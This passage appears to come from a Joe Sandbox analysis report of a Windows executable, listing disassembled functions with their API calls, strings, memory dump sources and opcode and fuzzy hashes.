                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 749574446-0
                                                                                                                    • Opcode ID: dabb2af15662d10db9be693ef807814dd076830720e325bd691a1a254c844d80
                                                                                                                    • Instruction ID: 2cb2c6878e3e1886ec52647c6b7789a22a3aafb0a089b1caf8be7ef63dda3319
                                                                                                                    • Opcode Fuzzy Hash: dabb2af15662d10db9be693ef807814dd076830720e325bd691a1a254c844d80
                                                                                                                    • Instruction Fuzzy Hash: F0A0113008800A8A8E802B32EA0800E3B20EB20BC830002A8A00ACA0A2CB22880F8A00
                                                                                                                    Function 00E4AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00E4AE72,C:\Users\user\Desktop,00000000,00E7946A,00000006), ref: 00E4AC08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611563598-0
                                                                                                                    • Opcode ID: b4e5b18f0bf4e1cf2c44111f29cf1ccb133ff08fa67d92b973146426b5ca7f6d
                                                                                                                    • Instruction ID: 91efd589445cadc27d136003fc0a1abdfdd36b8b00708a2cfcbb96ea002de240
                                                                                                                    • Opcode Fuzzy Hash: b4e5b18f0bf4e1cf2c44111f29cf1ccb133ff08fa67d92b973146426b5ca7f6d
                                                                                                                    • Instruction Fuzzy Hash: 5BA011302022008BA2000B32AF0AA0FBAAAAFA2B80F00C028A00080030CB30C820AA00
                                                                                                                    Function 00E39620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00E395D6,?,?,?,?,?,00E62641,000000FF), ref: 00E3963B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: ee9ece119ed363e8f7be8b8545776717f18686ed6ebb3f5ea415c5f65f4b877a
                                                                                                                    • Instruction ID: 4597118a090e69eb7c10ed2ef44b933dc579c01dfd525a876bd858022820d598
                                                                                                                    • Opcode Fuzzy Hash: ee9ece119ed363e8f7be8b8545776717f18686ed6ebb3f5ea415c5f65f4b877a
                                                                                                                    • Instruction Fuzzy Hash: 72F08970482B159FDB308A74C85E792BBE86B12325F046B1ED0E6629E1D7A1698DCA40

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00E4C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E4C2B1
                                                                                                                    • EndDialog.USER32(?,00000006), ref: 00E4C2C4
                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00E4C2E0
                                                                                                                    • SetFocus.USER32(00000000), ref: 00E4C2E7
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00E4C321
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E4C358
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E4C36E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E4C38C
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E4C39C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E4C3B8
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E4C3D4
                                                                                                                    • _swprintf.LIBCMT ref: 00E4C404
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00E4C417
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E4C41E
                                                                                                                    • _swprintf.LIBCMT ref: 00E4C477
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00E4C48A
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E4C4A7
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00E4C4C7
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E4C4D7
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00E4C4F1
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00E4C509
                                                                                                                    • _swprintf.LIBCMT ref: 00E4C535
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00E4C548
                                                                                                                    • _swprintf.LIBCMT ref: 00E4C59C
                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00E4C5AF
                                                                                                                      • Part of subcall function 00E4AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E4AF35
                                                                                                                      • Part of subcall function 00E4AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00E6E72C,?,?), ref: 00E4AF84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                    • String ID: %s %s$%s %s %s$P$REPLACEFILEDLG
                                                                                                                    • API String ID: 797121971-530609767
                                                                                                                    • Opcode ID: 41e28ce8142a1dbcff2857537b089ae541d0e6a54da1f23cda73fefbddca3246
                                                                                                                    • Instruction ID: 9fbc51d64d44bd04759d6e516da4bcd65795c668af9a8ecca03f9abab5812491
                                                                                                                    • Opcode Fuzzy Hash: 41e28ce8142a1dbcff2857537b089ae541d0e6a54da1f23cda73fefbddca3246
                                                                                                                    • Instruction Fuzzy Hash: 9C91D672249344BFD2619BB1EC49FFB77ECEB4A704F00581AF645E2091D7B5A6088762
                                                                                                                    Function 00E36FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E36FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00E37013
                                                                                                                    • _wcslen.LIBCMT ref: 00E37084
                                                                                                                      • Part of subcall function 00E37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E37AAB
                                                                                                                      • Part of subcall function 00E37A9C: GetLastError.KERNEL32 ref: 00E37AF1
                                                                                                                      • Part of subcall function 00E37A9C: CloseHandle.KERNEL32(?), ref: 00E37B00
                                                                                                                      • Part of subcall function 00E3A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641,000000FF), ref: 00E3A1F1
                                                                                                                      • Part of subcall function 00E3A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E3977F,?,?,00E395CF,?,?,?,?,?,00E62641), ref: 00E3A21F
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E37139
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E37155
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E37298
                                                                                                                      • Part of subcall function 00E39DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E373BC,?,?,?,00000000), ref: 00E39DBC
                                                                                                                      • Part of subcall function 00E39DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00E39E70
                                                                                                                      • Part of subcall function 00E39620: CloseHandle.KERNELBASE(000000FF,?,?,00E395D6,?,?,?,?,?,00E62641,000000FF), ref: 00E3963B
                                                                                                                      • Part of subcall function 00E3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A501
                                                                                                                      • Part of subcall function 00E3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                    • Opcode ID: caa978974057dce43d0d573ff64df07678606116ca8f30882db85e116fec15b2
                                                                                                                    • Instruction ID: cfb409e1a0533541b2f54a2e08bbab2075d8ef437b415c87d90bb1d1966189bb
                                                                                                                    • Opcode Fuzzy Hash: caa978974057dce43d0d573ff64df07678606116ca8f30882db85e116fec15b2
                                                                                                                    • Instruction Fuzzy Hash: 66C1C6B1904644AADB35DB74DC4AFEFBBE8AF04304F006559F996F3182D770AA48CB61
                                                                                                                    Function 00E5D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: d384c475f3501916e52a04144069bb900b2a8f5e16d35e874241e5dbfbea6dc0
                                                                                                                    • Instruction ID: e32b08df5ed3189bff3d2811f68c87f405314b4c3d95da085a07cc71525d7289
                                                                                                                    • Opcode Fuzzy Hash: d384c475f3501916e52a04144069bb900b2a8f5e16d35e874241e5dbfbea6dc0
                                                                                                                    • Instruction Fuzzy Hash: 95C23C71E086288FDB79CE289D407E9B7B5EB44306F1459EAD84DF7240E774AE898F40
                                                                                                                    Function 00E332F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                    • Opcode ID: 35fd160585f9431e8e1ff2dbda386d0e399d42736e5aadd45d69305edf159cb8
                                                                                                                    • Instruction ID: 4e4e5daa6f37defd6a8572c34b961a849641556c3458e8757bb09fc8be5330eb
                                                                                                                    • Opcode Fuzzy Hash: 35fd160585f9431e8e1ff2dbda386d0e399d42736e5aadd45d69305edf159cb8
                                                                                                                    • Instruction Fuzzy Hash: E932C471510384ABDB18DF74C899EE97FE5AF54304F04647DFD8AAB282DB709A49CB20
                                                                                                                    Function 00E3286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E32874
                                                                                                                    • _strlen.LIBCMT ref: 00E32E3F
                                                                                                                      • Part of subcall function 00E402BA: __EH_prolog.LIBCMT ref: 00E402BF
                                                                                                                      • Part of subcall function 00E41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E3BAE9,00000000,?,?,?,0001047E), ref: 00E41BA0
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E32F91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                    • String ID: CMT
                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                    • Opcode ID: 58fa221a428d59f8c4e21de0f9cb49d8dfa9fb1a70214783e48795cb5d990418
                                                                                                                    • Instruction ID: c3cdd52775c0561035f02d7755f4939d5385c4bedbd3e6f89b78904c0debca8a
                                                                                                                    • Opcode Fuzzy Hash: 58fa221a428d59f8c4e21de0f9cb49d8dfa9fb1a70214783e48795cb5d990418
                                                                                                                    • Instruction Fuzzy Hash: F56227716002448FDB19DF34C88ABEA7FE1EF54304F08547EED9AAB282DB759945CB60
                                                                                                                    Function 00E4E6A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(80000000,,0000001C,00E4E7DD,00000000,?,?,?,?,?,?,?,00E4E5E8,00000004,00E91CEC,00E4E86D), ref: 00E4E6B4
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E4E5E8,00000004,00E91CEC,00E4E86D), ref: 00E4E6CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                    • String ID: D$
                                                                                                                    • API String ID: 401686933-250975860
                                                                                                                    • Opcode ID: 63ae3190674f228b3e432fffb7b645d7c5c3ee99965cba2ca87a76afea86ccf9
                                                                                                                    • Instruction ID: 036452e2be131547423d53189696b47416414220cdc74da621960fefc3b99ac7
                                                                                                                    • Opcode Fuzzy Hash: 63ae3190674f228b3e432fffb7b645d7c5c3ee99965cba2ca87a76afea86ccf9
                                                                                                                    • Instruction Fuzzy Hash: 94012B326001096BDF14DE29EC09BEE7BAAFFC4338F0CC121ED19E7250D634D9058680
                                                                                                                    Function 00E4F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E4F844
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00E4F910
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E4F930
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00E4F93A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 254469556-0
                                                                                                                    • Opcode ID: 7efd79dc9b45fbfe333d7b8b1fa3f5ab45fb02f619a31432c55cf3303fdc4911
                                                                                                                    • Instruction ID: 9c735ed898675dbbbc00118d836bc85caa048359d1ffbf3fc2b71ad5547f1c24
                                                                                                                    • Opcode Fuzzy Hash: 7efd79dc9b45fbfe333d7b8b1fa3f5ab45fb02f619a31432c55cf3303fdc4911
                                                                                                                    • Instruction Fuzzy Hash: 11312975D052199FDF20DFA5E9897CDBBF8AF08704F1050AAE50CAB250EB759B888F44
                                                                                                                    Function 00E58EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E58FB5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E58FBF
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00E58FCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 0fd8cda2b326120520ef37867bd6d231bc9df8c482a977c0e12ddc1a56865ac7
                                                                                                                    • Instruction ID: e68293afe146358decf7fd9e00e4f2d81685cd21e15d142e327b93bcde34ea23
                                                                                                                    • Opcode Fuzzy Hash: 0fd8cda2b326120520ef37867bd6d231bc9df8c482a977c0e12ddc1a56865ac7
                                                                                                                    • Instruction Fuzzy Hash: 0531D87490122C9BCB21DF25DD8979DBBB4AF08710F5052EAE81CB7250EB709F858F54
                                                                                                                    Function 00E5D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction ID: a75cea1ecde9f058bfcabef16e43d98f95cbc7c46c8472d5eb48ecd930811406
                                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction Fuzzy Hash: 26022C71E042199BDF28CFA9C8806ADB7F1EF88315F25956AD919FB380D730A945CB90
                                                                                                                    Function 00E4AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E4AF35
                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00E6E72C,?,?), ref: 00E4AF84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
